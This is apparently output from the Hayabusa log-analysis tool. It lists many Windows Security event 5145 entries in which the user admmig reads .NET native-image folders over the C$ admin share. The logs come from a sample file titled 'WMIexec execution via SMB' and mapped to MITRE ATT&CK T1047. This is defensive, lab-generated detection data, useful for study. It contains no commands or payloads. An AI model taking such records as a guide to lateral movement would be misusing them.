2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
